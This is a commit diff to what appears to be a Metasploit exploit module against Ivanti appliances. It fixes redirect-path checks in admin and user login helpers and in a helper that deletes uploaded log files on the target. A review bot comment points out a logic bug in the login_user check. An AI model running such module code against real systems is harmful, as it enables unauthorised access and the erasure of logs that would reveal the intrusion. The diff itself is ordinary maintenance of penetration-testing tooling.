Use TARGET_URI when checking the redirection URI

Christophe De La Fuente
2024-12-02 16:45:12 +01:00
parent 3dcb9d58ab
commit a46b2f437f
@@ -130,12 +130,12 @@ class MetasploitModule < Msf::Exploit::Remote
)
raise IvantiUnknownError, "[login_admin] No response from '#{uri}'" if res.nil?
if res.code == 302 && res.redirection.to_s == '/dana-na/auth/url_admin/welcome.cgi?p=admin%2Dconfirm'
if res.code == 302 && res.redirection.to_s == normalize_uri(target_uri.path, '/dana-na/auth/url_admin/welcome.cgi?p=admin%2Dconfirm')
print_warning("The admin #{datastore['ADMIN_USERNAME']} is already logged in")
res = confirm_login_admin(res.redirection.to_s)
res = confirm_login_admin(normalize_uri(target_uri.path, res.redirection.to_s))
end
if res.code != 302 || res.redirection.to_s != '/dana-admin/misc/admin.cgi'
if res.code != 302 || res.redirection.to_s != normalize_uri(target_uri.path, '/dana-admin/misc/admin.cgi')
raise IvantiNoAccessError, "[login_admin] Login failed (username: #{datastore['ADMIN_USERNAME']}, password: #{datastore['ADMIN_PASSWORD']})"
end
end
@@ -224,12 +224,12 @@ class MetasploitModule < Msf::Exploit::Remote
)
raise IvantiUnknownError, "[login_user] No response from '#{uri}'" if res.nil?
if res.code == 302 && res.redirection.to_s == '/dana-na/auth/url_default/welcome.cgi?p=user%2Dconfirm'
if res.code == 302 && res.redirection.to_s == normalize_uri(target_uri.path, '/dana-na/auth/url_default/welcome.cgi?p=user%2Dconfirm')
print_warning("User #{datastore['USERNAME']} is already logged in.")
res = confirm_login_user(res.redirection.to_s)
res = confirm_login_user(normalize_uri(target_uri.path, res.redirection.to_s))
end
if res.code != 302 && res.redirection.to_s != '/dana/home/starter0.cgi?check=yes'
if res.code != 302 && res.redirection.to_s != normalize_uri(target_uri.path, '/dana/home/starter0.cgi?check=yes')
raise IvantiNoAccessError, "[login_user] Login failed (username: #{datastore['USERNAME']}, password: #{datastore['PASSWORD']})"
end
end
@@ -402,7 +402,7 @@ class MetasploitModule < Msf::Exploit::Remote
)
raise IvantiUnknownError, "[delete_log_file] No response from '#{uri}'" if res.nil?
if res.code != 302 || res.redirection.to_s != '/dana-admin/auth/uploadedlogs.cgi'
if res.code != 302 || res.redirection.to_s != normalize_uri(target_uri.path, '/dana-admin/auth/uploadedlogs.cgi')
raise IvantiUnexpectedResponseError, "[delete_log_file] Unable to delete the log file (status code=#{res.code})"
end
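Review bot: In the `login_user` hunk the rewritten failure check still joins its two tests with `&&`, so any 302 response is treated as a successful login whatever its Location; `login_admin` and `delete_log_file` use `||` for the same check. The line should read `if res.code != 302 || res.redirection.to_s != normalize_uri(target_uri.path, '/dana/home/starter0.cgi?check=yes')`. Separately, the new `confirm_login_admin` and `confirm_login_user` calls prepend `target_uri.path` to `res.redirection.to_s`, which the comparison just above has established already starts with that base path. With a non-root TARGETURI the prefix would presumably be applied twice, so passing `res.redirection.to_s` unchanged looks correct there, unless the confirm helpers (not visible here) expect otherwise. The enclosing methods start outside the hunks shown.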